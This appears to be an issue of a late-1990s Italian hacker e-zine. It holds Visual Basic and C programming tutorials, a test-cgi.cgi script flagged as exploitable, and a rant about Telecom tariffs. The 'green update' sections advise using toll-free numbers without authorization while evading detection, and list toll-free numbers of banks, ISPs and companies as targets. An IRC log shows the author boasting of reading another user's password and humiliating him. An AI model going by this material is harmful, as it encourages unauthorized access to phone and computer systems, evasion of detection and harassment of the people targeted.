Ora chiamiamo il form "frmPrincipale", un pulsante "cmdEsegui" e l'altro "cmdEsci",
il TextBox "txtTesto" e la Label "lblTesto" (quando una Label si riferisce a un
TextBox io di solito gli d• lo stesso nome... Š solo una questione di comodit…).
Lo scopo del programma Š visualizzare un testo (contenuto in txtTesto) 3 volte.
Assegnamo le caption ai vari oggetti (compreso il form.... inventate un titolo)
e passiamo al codice.
Quella che abbiamo creato ora Š l'interfaccia, quello cioŠ che l'utente vede,
con il quale l'utente interagisce. Come detto, passiamo al codice. Prima di
tutto dobbiamo scegliere gli eventi da gestire (nel nostro caso i pulsanti).
Facendo doppio click su un oggetto, appare la finestra codice. In alto sono
presenti 2 ComboBox: quella a sx indica l'oggetto (tranne "generale" che
vedremo dopo) mentre a dx ci sono i vari eventi gestibili per l'oggetto selezionato.
Facendo ad es. doppio click su cmdEsci, avremo a sx "cmdEsci", e a dx "Click":
significa che quella routine gestisce l'evento CLICK sul pulsante CMDESCI.
Ecco come potrebbe essere un esempio di codice:

Sub cmdEsegui_Click()
Dim I as Integer
Dim Testo as String

For I = 1 to 3
MsgBox Testo
Next I
End Sub

Sub cmdEsci_Click()
Unload frmPrincipale
End
End Sub

Cominciamo con la seconda routine. Questa viene richiamata quando si verifica
l'evento Click sul pulsante cmdEsci.
La prima istruzione, Unload xxx, scarica dalla memoria il parametro indicato che pu•
essere un form o una matrice (sulle matrici ci torneremo in uno dei prossimi numeri).
La seconda, End, interrompe l'esecuzione del codice, chiude i file aperti con
l'istruzione Open (anche questa rimandata al futuro) e annulla le variabili.
Questa istruzione Š facoltativa... ma sempre comoda!!!

La prima routine Š un p• pi— "complessa"... e necessita di qualche spiegazione in pi—.
L'istruzione Dim serve per dichiarare le variabili. In VB non Š obbligatorio
dichiarare le variabili (a meno che voi, con un'apposita istruzione, non lo
facciate diventare tale). Nonostante questo, Š sempre buona abitudine farlo,
anche perchŠ altrimenti il compilatore le considerer… tutte di tipo Variant (vedi sotto).
Vi sono diversi tipi di variabili.

Questa Š una parte della guida che riepiloga i tipi di dati:
***********************************************************************
Tipo di dati Spazio su disco Intervallo

Byte 1 byte Da 0 a 255
Boolean 2 byte True o False
Integer 2 byte Da -32.768 a 32.767
Long (intero lungo) 4 byte Da -2.147.483.648 a 2.147.483.6477
Single (virgola mobile a precisione semplice) 4 byte Da -3,402823E38 a -1,401298E-45 per valori negativi;
Da 1,401298E-45 a 3,402823E38 per valori positivi
Double (virgola mobile a precisione doppia) 8 byte Da -1,79769313486232E308 a -4,94065645841247E-324 per valori negativi;
Da 4,94065645841247E-324 a 1,79769313486232E308 per valori positivi.
Currency (intero diviso) 8 byte Da -922.337.203.685.477,5808 a 922.337.203.685.477,5807
Decimal 14 byte +/-79.228.162.514.264.337.593.543.950.335 senza virgola;
+/-7,9228162514264337593543950335 con 28 decimali;
il numero minore diverso da zero Š +/-0,0000000000000000000000000001
Date 8 byte Dall'1 gennaio 100 al 31 dicembre 9999
Object 4 byte Qualsiasi riferimento Object
String (lunghezza variabile) 10 byte+lung. stringa Da 0 a circa 2 miliardi
String (lunghezza fissa) Lunghezza stringa Da 1 a circa 65.400
Variant (con numeri) 16 byte Qualsiasi valore numerico fino all'intervallo di un Double
Variant (con caratteri) 22 byte+lung. stringa Stesso intervallo di String a lunghezza variabile
Definito dall'utente (utilizzando Type) Num. richiesto dagli elementi L'intervallo di ciascun elemento Š identico a quello del relativo tipo di dati sopraelencato.

***********************************************************************

Per cercare di utilizzare il minor numero di risorse possibili, Š inutile
utilizzare un variant quando potrebbe bastare un integer.
Quindi Š sempre necessario controllare quali valori dovranno finire nella
variabile e dichiararla di consenguenza cercando di ottimizzare le risorse.
Nel nostro esempio le variabili I e N sono di tipo Integer, mentre Testo Š di tipo String.
E' possibile dichiarare pi— variabili su una riga, ad es.
Dim I as Integer, Testo as String
Š uguale rispetto alla sintassi dell'esempio.
Ritorneremo sul discorso delle variabili quando sar… il momento di definirne
qualcuna nostra (con il comando Type)........

Abbiamo detto che il messaggio in txtTesto viene visualizzato 3 volte. Per
fare questo utilizziamo un ciclo For.
La sintassi Š:

For x = y to z Step w
[istruzioni]
Next x

dove x Š il contatore (la variabile che sar… incrementata), y Š il valore
iniziale, z Š il valore finale e w Š il margine di incremento (di quanto cioŠ
l'indice aumenta ad ogni esecuzione del ciclo).
L'opzione Step non Š obbligatoria e, nel caso non fosse presente, viene preso
come riferimento il valore 1. Lo Step pu• anche essere negativo (ad es. -1).
ATTENZIONE AI CICLI INFINITI!!!!!!
Infatti scrivendo per esempio:

For x = 1 to 5 Step -1

Si avr… un ciclo infinito........
Potrebbe essere necessario uscire dal ciclo prima della fine dello stesso (ad
es. al verificarsi di una certa condizione). Esiste in VB un comando che
permette di uscire dal ciclo in qualunque momento.
Il comando in questione Š Exit For.

E' anche possibile fare dei cicli nidificati (uno dentro l'altro). Per esempio:
For I = 1 to 100
For M = 1 to 50
[istruzioni]
Next M
Next I

Nell'esempio si esegue un ciclo ad indice I 100 volte, e, per ognuno di questi
cicli, ce n'Š un altro ad indice M che si ripete 50 volte.

Esiste inoltre un altro tipo di ciclo che vedremo in una delle prossime volte (se ci saranno) =)

Ron|n

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ C TUTORIAL [ prima parte ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Il C e il C++ sono probabilmente i linguaggi di programmazione preferiti
dai professionisti, e sicuramente quelli preferiti dagli hackerz per i loro
loschi scopi. Quindi ora tentero' di spiegarvi i fondamenti del C....

Ecco come si potrebbe presentare un semplicissimo programma C :
-----

#include <stdio.h>

main(){

int numero;

numero = 3;
printf("Oggi la mamma di GiovanBattista ha fatto %d bucchini",numero);
numero++;
printf("\n\rIeri invece ne ha fatti %d",numero);

}
-----
Allora, la prima riga del codice, #include <stdio.h>, dice al compilatore
di includere nel programma funzioni, tipi e costanti definite in stdio.h.
stdio e' appunto una libreria che contiene le funzioni di base per l'input
e l'output.
Il blocco principale, quello che viene eseguito automaticamente
all'avvio del programma, si chiama main. Le due parentesi tonde dovrebbero
contenere gli argomenti da passare alla funzione, in questo caso sono vuote,
perche' non viene passato nessun argomento.
Le parentesi graffe, invece, indicano l'inizio e la fine di un blocco
(in questo caso la funzione main).
Con la terza riga, int numero, dichiariamo una variabile chiamata numero,
di tipo int (cioe' che va da -32767 a 32767) altri tipi di variabili
comunente usate sono :

long = da -2147483647 a 2147483647
float = da 3,4 * (10**-38) a 3,4 * (10**+38)
double = da 1,7 * (10**-308) a 1,7 * (10**308)

Il tipo char, invece, indica un carattere, che in C altro non e' che un
numero. Il tipo unsigned char puo' andare da 0 a 255, mentre un signed char
da -127 a 127. Un carattere viene racchiuso tra apici, ed essendo in realta'
un numero e' lo stesso fare....

carattere = 'A'

oppure....

carattere = 65

In entrambi i casi il carattere sara' la A maiuscola, dato che 65 e' il codice
ASCII che identifica la A.

Tornando al codice di esempio, con la quarta riga, numero = 3, assegnamo
il valore 3 alla variabile numero. = infatti e' in C l'operatore di
assegnamento.
Successivamente c'e' una chiamata alla funzione printf, contenuta appunto
in stdio (per questo abbiamo incluso stdio.h). printf e' seguito da una
coppia di parentesi tonde all'interno delle quali sono racchiusi i parametri
da passare alla funzione, in questo caso la stringa da stampare.
Notiamo che le stringhe in C vengono racchiuse tra virgolette.
All'interno delle virgolette si trova anche %d. Cos'e' ? Semplicemente
una specifica di stampa, che indica un numero decimale. Il compilatore
capisce che al posto di %d dovra' stampare sullo schermo un numero, che
verra' passato come argomento successivamente. Gli argomenti sono separati da
virgole. In questo caso alla specifica di stampa %d verra' sostituito il
valore della variabile numero, che contiene 3. Quindi apparira' sullo
schermo :
Oggi la mamma di GiovanBattista ha fatto 3 bucchini

"numero++;" e' l'equivalente di "numero = numero+1;". Se avessimo voluto
incrementarlo di 3 invece avremmo dovuto scrivere "numero+=3;", per
decrementarlo basta sostituire i piu' con meno. In questo caso il numero
viene incrementato di una sola unita', e conterra' quindi 4.
La chiamata seguente a printf stampera' al posto di %d il nuovo valore di
numero, e scrivera' quindi :

Ieri invece ne ha fatti 4

\n e \r vengono interpretati come caratteri speciali corrispondenti
rispettivamente a <newline> e <carriage-return>, cioe' \n va alla riga
successiva e \r torna a capo.

Il programma termina con } che indica la fine del blocco main.

Al contrario di printf, main non e' seguita da un punto e virgola, ma dalle
parentesi graffe che racchiudono il codice, essendo in questo caso non una
chiamata a funzione, ma una definizione di funzione (cioe' noi non chiamiamo
la funzione main, ma la definiamo, "costruendo" il codice che la comporra'.
Una definizione di funzione contiene il codice da eseguire quando la funzione
viene chiamata, mentre una chiamata alla funzione esegue quel codice gia'
stabilito dalla definizione).

Le specifiche di stampa vengono usate con printf per indicare il formato di
cio' che vogliamo stampare a video.

Es.

/* Tutto cio' che e' racchiuso tra questi due simboli viene considerato
un commento */


#include <stdio.h>

main(){
char carattere;

carattere = 'A';
printf("%cBC",carattere);
printf("\n\r%dBC",carattere); // anche questo viene considerato
// commento
}

La prima chiamata a printf stampa sullo schermo "ABC", dato che abbiamo
dato come specifica di stampa della variabile carattere %c, cioe' carattere.
La seconda invece scrivera' "65BC", perche' sotto forma di decimale 'A'
equivale a 65.

E' ovviamente possibile utilizzare piu' specifiche di stampa in una sola
chiamata.

Es.

printf("Sotto forma di carattere Š %c, sotto forma di numero Š %d",carattere,carattere);


Per gestire l'input dalla tastiera, invece, sempre per rimanere nell'ambito
delle funzioni di stdio, possiamo usare la funzione scanf.

Es.

#include <stdio.h>

main(){
int ilnumero;
scanf("%d",&ilnumero);
}

%d indica che la scanf deve prepararsi a ricevere come input dalla tastiera
un numero intero, &ilnumero indica DOVE schiaffare questo valore.
La & davanti al nome della variabile indica l'indirizzo in memoria della
variabile. Cioe', mentre ilnumero indica il valore della variabile (in questo
caso un numero), &ilnumero indica il posto in memoria dove si trova la variabile
ilnumero. Dato che scanf si aspetta un indirizzo e' necessario inserire
l'indirizzo della variabile ilnumero, e viene fatto appunto con &.

Dato che una variabile puo' occupare piu' di una "casella" in memoria,
viene considerato come indirizzo quello della prima casella.
Per indicare invece il valore contenuto in un indirizzo di memoria si
utilizza *. Esiste una tipo di variabile chiamato puntatore, che contiene
un indirizzo.

Es.

#include <stdio.h>

main{
int *ilpuntatore;
int ilnumero;

ilpuntatore = &ilnumero;
scanf("%d",ilpuntatore);

}

Con "int *ilpuntatore;" dichiariamo la variabile ilpuntatore come un
puntatore a una variabile di tipo int (infatti dovra' contenere l'indirizzo
di ilnumero, che e' un int).
"ilpuntatore = &ilnumero" assegna alla variabile ilpuntatore l'indirizzo in
memoria della variabile ilnumero.
Quando chiamiamo scanf, quindi, possiamo passare come parametro ilpuntatore,
senza usare la &, dato che ilpuntatore contiene gia' l'indirizzo di ilnumero.
Come ho gia' detto, per riferirsi al valore contenuto in un indirizzo di
memoria, si usa l'asterisco (*), quindi, una volta assegnato a ilpuntatore
l'indirizzo della variabile ilnumero, e' la stessa cosa fare ....

ilnumero = 3;

oppure .....

*ilpuntatore = 3;


Invece scrivere "*&ilnumero = 3;" e' una grandissima stronzata perche'
e' la stessa cosa di "ilnumero = 3;", solo con due caratteri in piu' :)

Un altro tipo di variabile, invece, e' l'array.
Un array e' un insieme di variabili, che hanno lo stesso nome e che vengono
quindi identificate da un numero.

Es.

int inumeri[50];

La variabile inumeri non conterra un numero solo ma 50 numeri.

inumeri[0] conterra' il primo numero, inumeri[1] il secondo, fino a
inumeri[49], che conterra' il cinquantesimo numero.

Es.

inumeri[20] = 25;


Ovviamente e' possibile definire array di dimensioni diverse e anche array
a piu' dimensioni.

Es.

int tris[3][3];

In questo caso e' un array rappresentante uno schema di tris (3 righe per
3 colonne).

tris[0][0] rappresentera' la prima casella e tris[2][2] l'ultima.

Passiamo ora ad una parte fondamentale : la creazione di nuove funzioni.
Infatti scrivere tutto il codice in main non sarebbe certo elegante, e
creerebbe molta difficolta' nella comprensione del programma e nella
ricerca di errori, soprattutto per programmi complessi.


Es.


#include <stdio.h>

int doppio(int unnumero);

main(){

int numero;

scanf("%d",&numero);
printf("\n\rIl doppio di %d Š %d",numero,doppio(numero));

}

int doppio(int unnumero){

return unnumero*2;

}


La prima riga dopo l'include, "int doppio(int unnumero);" e' il prototipo
della funzione doppio, che verra' definita successivamente, dopo il main.
La parola int prima del nome della funzione indica che la funzione ritorna
(cioe' restituisce come risultato dell'operazione) un valore di tipo int.
All'interno delle parentesi ci sono i parametri accettati dalla funzione.
In questo caso e' uno solo, e' di tipo int, e viene riconosciuto all'interno
della funzione con il nome "unnumero".
Una funzione che non ritorna alcun valore (cioe' che serve solo ad eseguire
una serie di istruzioni) viene preceduta da void. Se una funzione non
accetta argomenti allora si scrive void tra le parentesi tonde.
"return" serve a definire il valore di ritorno della funzione. In questo caso
costituisce l'unica riga della funzione, e ritorna il numero passato come
argomento moltiplicato per 2.


Un programma dovra' compiere delle scelte, e per fare cio' si usa l'istruzione
"if".

Es.

if (lamammadigianteoboldohachiavato()) nonchiavartela();

In questo caso il programma controlla il valore di ritorno della funzione
"lamammadigianteoboldohachiavato()". Se il valore di ritorno e' 1
(considera 1=VERO 0=FALSO) allora eseguira' la funzione "nonchiavartela()"


AltroEs.

if (!lamammadigianteoboldohachiavato()) chiavatela();

In questo caso se la funzione lamammadigianteoboldo NON restituisce 1 (e quindi
vero) esegue la funzione chiavatela();
Il punto esclamativo (!) infatti e' in C la negazione. Cioe' in questo caso
viene intesa cosi' :

se NON E' VERO che la funzione lamammadigianteoboldohachiavato ha ritornato
1, allora esegui chiavatela();

Prendiamo ora un altro esempio...


if (numero>100) printf("eh cosi' grande ! non ce la faccio a elaborarlo !"); // :)

Cosa succede ? Il simbolo > vuol dire "maggiore di", questo lo sapevamo, ma
la if non si limita a vedere se un espressione e' vera o falsa ?
Appunto. Se numero e' maggiore di 100 allora (numero>100) sara' vero, altrimenti
falso.

Se si vogliono eseguire, a una certa condizione, piu' di un'istruzione, si
devono racchiudere le istruzioni tra due graffe.


Es.

if (seistronzo()){

vaffanculo();
nonmirompereilcazzo();
}


Per un'alternativa si usa invece "else"

Es.

if (seistronzo()){

vaffanculo();
nonmirompereilcazzo();
}

else {
benvenuto();
accomodatipure();
}


E' anche possibile utilizzare gli operatori binari...


Es.

if ((seistronzo()) || (seiscemo()) || (seiunrompipalle())) {

vaffanculo();
nonmirompereilcazzo();

}


|| rappresenta infatti l'OR. Cioe' se anche solo una delle espressioni
e' vera, allora si avvera la condizione.

&& invece e' l'AND, cioe' la condizione e' soddisfatta solo quando TUTTE
le espressioni risultano vere, mentre ^ e' lo XOR, cioe' l'OR esclusivo
(se solo una delle due espressioni e' vera allora si avvera la condizione,
se sono entrambe false o entrambe vere la condizione non e' soddisfatta)



Passiamo ora ad esaminare i cicli in C.
"while" viene usato nella sintassi :

while (condizione){

...codice da eseguire a ogni ripetizione...

}

E ripete le istruzioni tra le graffe fino a quando e' vera la condizione.
Per una sola istruzione si potrebbero anche non usare le graffe, ma conviene
sempre usarle per evitare confusione.

Es.

#include <stdio.h>

main(){

int ipriminumeri[10];
int numero;

numero = 0;

while (numero<10){

ipriminumeri[numero] = numero;
numero++;

}

}



Questo codice ripete il ciclo finche' la variabile numero e' minore di 10,
e assegna agli elementi dell'array ipriminumeri i numeri da 0 a 9.
Il controllo sulla condizione viene eseguito prima delle istruzioni contenute
nel ciclo. Per farlo eseguire dopo le istruzioni del ciclo si usa do.

Sintassi :

do {

...Istruzioni da eseguire....

} while (condizione);

"for", invece, e' in realta' inutile, ma offre indubbie comodita' in alcuni casi
rispetto a while.

Es.

#include <stdio.h>

main(){

int t;

for (t=0;t<10;t++){

..codice..
..codice..
..codice..
}

}

I tre campi tra le parentesi sono separati da 2 ; e sono, rispettivamente,
l'inizializzazione delle variabili, la condizione, e l'aggiornamento.
In pratica all'inizio (prima che il ciclo cominci) alla variabile t
e' assegnato il valore 0.
La condizione e' (t<10), cioe' il ciclo continuera' fino a quando il valore
della t sara' minore di 10.
L'aggiornamento e' t++, cioe' alla fine di ogni ciclo la t viene incrementata
di 1.
In questo caso il valore di t viene incrementato alla fine del ciclo.
Se avessimo scritto ++t sarebbe stato incrementato all'inizio.

E' anche possibile inizializzare piu' variabili...

for (t=0,s=0,z=0;t<10;t++,s++,z-=2){

..codice..
..codice..
..codice..

}



Per terminare un ciclo in anticipo si utilizza "break", senza parentesi.
"continue", invece consente di ritornare direttamente all'inizio del ciclo
senza eseguire le istruzioni successive.

Ecco, questi sono i fondamenti del C.


CRUSAD3R
CRUSAD3R2@hotmail.com
http://members.xoom.com/CRUSAD3R/index.htm
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³GREEN UPDATE [ che sfiga ne han beccati altri ]³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Questo articolo lo scrivo dopo che altre persone sono state bustate per l' uso
di green senza ovviamente averne l' autorizzazione ... Allora i green sono
pericolosi e anche fare del sano war-dialing fa' sospettare qualcosa agli op
telecazz [ come detto anche in bfi se non sbaglio fare 1000 chiamate ai green
in un giorno puo' risultare alquanto sospetto visto che teleczz logga le
abitudini dell' utente ] allora un consiglio , non dico di non usarli [ fischia
la bolletta costa ] ma usateli in pochi [ x esempio se uno trova un green e
riesce ad accedervi non sparga la voce in mezza internet e faccia collegare
3000 persone ma lo usi x lui ] comprate un volmetro per controllare la tensione
della linea ..... Conviene e ricordateve che se vi bustano son solo cazzacci
vostri .

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IL LOG DEL MESE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ok allora questa parte della rivista include la conversazione + divertente del mese in irc con qualche coglione ... [ se non vi piace la togliamo ] ....[ ps ho tolto alcune cosa come login e passwd di quel povero cristo e alcune correzioni a livello grafico ]

Session Start:
Session Ident: Nike1 (~xandria20@poort6-ip-x2.enertel.cybercomm.nl)
<Nike> hello
<Zerocool>Ciao
<Nike>ciao ascolta sai qualcosa di hacking
<Zerocool>Non molto
<Nike>Io sono un grande hacker
<Zerocool>Ma va?
<Nike>Io uso Net-bus e Back orifice alla perfezione penso che nessuno sia piu' bravo di me
<Zerocool>Quindi usi windowz
<Nike>Certo linux e gli altri os sono cagate
<Zerocool>.....
<Nike>Il mio sitema e' impenetrabile
<Zerocool>Magari hai anche un firewall installato
<Nike>No , sono stronzate
<Zerocool>Ah io uso il firewall della Conseal ma non riesco a trovare un settaggio perfetto x i rulez
<Nike>Toglilo non serve a un cazzo e fa perdere solo tempo
<ZeroCool>Seguiro' il tuo consiglio sicuramente
<Nike>Ascoltami e diverrai anche tu un grande HaCkeRzz come me
<ZeroCool>O lamer
<Nike> Se segui i miei consigli non diventerai certo un lamer
<ZeroCool>Ah capito , sai cosa e' phf e come si usa come exploit
<Nike>Un prog di tanti anni fa quando usavo ancora il mio caro 286
<ZeroCool>Ah grazie del consiglio
<Nike>Sono entrato in un pc
<Nike>Ora prendo' cio' che serve e poi cancello tutto
<ZeroCool>con cosa?
<Nike>Net-Bus ovviamente con net-bus
<ZeroCool>ah capisco
<Nike>Chissa la faccia del coglione quando gli cancello tutto?
<ZeroCool>gia' chissa , prova
<Nike>fatto
<ZeroCool>Con quel prog puoi prendere gli account ?
<Nike> Penso di si
<ZeroCool> Come pensi?
<Nike>Non avevo mai provato a farlo
<ZeroCool>ok ho capito una cosa
<Nike>cosa?
<ZeroCool>Nel tuo pc ci entra anche un cane
<Nike>CHE CAZZO DICI?
<ZeroCool>LA verita'
<ZeroCool>Che belle passwd che hai
<Nike>Che passwd io non ne ho
<ZeroCool>come ti colleghi a internet senza coglione [ non penso che tu viva in un cibercaffe]
<Nike>Tanto non puoi prenderle sono protette dal mio windowz
<ZeroCool>La minchia
<ZeroCool>userid: xxxxxxxxxx
<ZeroCool>passwd: xxxxxxxx
<Nike>bastardo io ti denuncio
<ZeroCool>A chi grande hacker che usa net-bus e bo [ impara qualcosa d'altro che ti conviene ]
<Nike>non usare le mie passwd per favore
<ZeroCool>chiedilo in ginocchio ... ahhahahaha
<Nike>per favore
<ZeroCool>Ora il grande hacker striscia?????
<Nike>Io supplico non striscio
<ZeroCool>quanti anni hai?
<Nike> 22
<ZeroCool> e ti fai ancora la pippi addosso coglione....
<Nike>
<ZeroCool> byezzzzz
Session Close

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³COSA DI SOLITO CONTIENE IL FILE TEST-CGI.CGI³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Forse vi puo' essere utile allora vediamolo:
#!/bin/sh

echo Content-type: text/plain
echo

echo CGI/1.0 test script report:
echo

echo argc is $#. argv is "$*".
echo

echo SERVER_SOFTWARE = $SERVER_SOFTWARE
echo SERVER_NAME = $SERVER_NAME
echo GATEWAY_INTERFACE = $GATEWAY_INTERFACE
echo SERVER_PROTOCOL = $SERVER_PROTOCOL
echo SERVER_PORT = $SERVER_PORT
echo REQUEST_METHOD = $REQUEST_METHOD
echo HTTP_ACCEPT = "$HTTP_ACCEPT"
echo PATH_INFO = $PATH_INFO
echo PATH_TRANSLATED = $PATH_TRANSLATED
echo SCRIPT_NAME = $SCRIPT_NAME
echo QUERY_STRING = $QUERY_STRING
echo REMOTE_HOST = $REMOTE_HOST
echo REMOTE_ADDR = $REMOTE_ADDR
echo REMOTE_USER = $REMOTE_USER
echo CONTENT_TYPE = $CONTENT_TYPE
echo CONTENT_LENGTH = $CONTENT_LENGTH
Esistono degli exploit su questo tipo di cgi di cui parleremo nel prossimo numero intanto , osservate e documentatevi...ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³GREEN UPDATE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

allora qua voglio fare cio'che + mi piace cioe' dare di green [ sembra una brutta cosa a dirla ]
Ok voglio dire che ora dopo che questo mi e' stato gentilmente fatto notare cerchero'
di dare descrizioni x quanto mi e' possibile , o almeno ci provo ...
Ok iniziamo ...:

167012837 un green di Tin x fare gli abbonamenti on-line [ se qualcuno ha
info su sto green mi contatti x favore ].
167231412 numero di CABI service
167615615 Banco Di Sardegna Phonebanking
167353415 DigiBank Internet Provider
167273626 Wall Net Telecomunicazioni
167274940 Internet Provider
167863191 Banca Dati [Roma]
167250789 Internet Provider
167807111 Informazioni Affari Banche Dati
167534220 Internet Provider [torino]
167212736 Internet Provider
167330149 Galactiva srl
167246140 Fax servizio Clienti
167852477 Intermedia Link Exchange
167018931 ISICOM srl , call center
167279147 Vendita Computer
167244035 Flah Net
167255285 Telegest
167258251 ....

Magari possono rendersi utili x voi che cazz ne so ; spero di darvene
di + la prossima volta.

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ MA QUANTO E' BELLA LA VITA ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora sto cazz di articolo lo scrivo precisando che non centra un cazz con
hacking , phreacking e cazzate varie .... E' solo una notizia che se vera
rende felice molta gente.
Allora la cara Telecazz notando la diminuzione di chiamate urbane [ quindi la
cara TUT ] ha deciso [ o almeno si spera ] di diminuire il costo delle stesse
visto che la maggior parte delle persone utilizza maggiormente il telefono
chiamando in urbana ... Spero che sia vero e anche se retupo Telecazz una
societa' di m.r.d. credo che stavolta fara' qualcosa di buono e questo mi
rende gioioso o forse se ne sbattera' le palle degli utenti come sempre ha
fatto ..Mha spero non la seconda.
Un sito molto bello che si oppone alla tut [ e che di cui penso ne avrete
letto da 100000 parti ] e' www.notut.com che protesta contro la tariffa urbana
a tempo [ un protesta che viene fatta in modo legale ] guardatelo ne vale la pena..

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SALUTI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
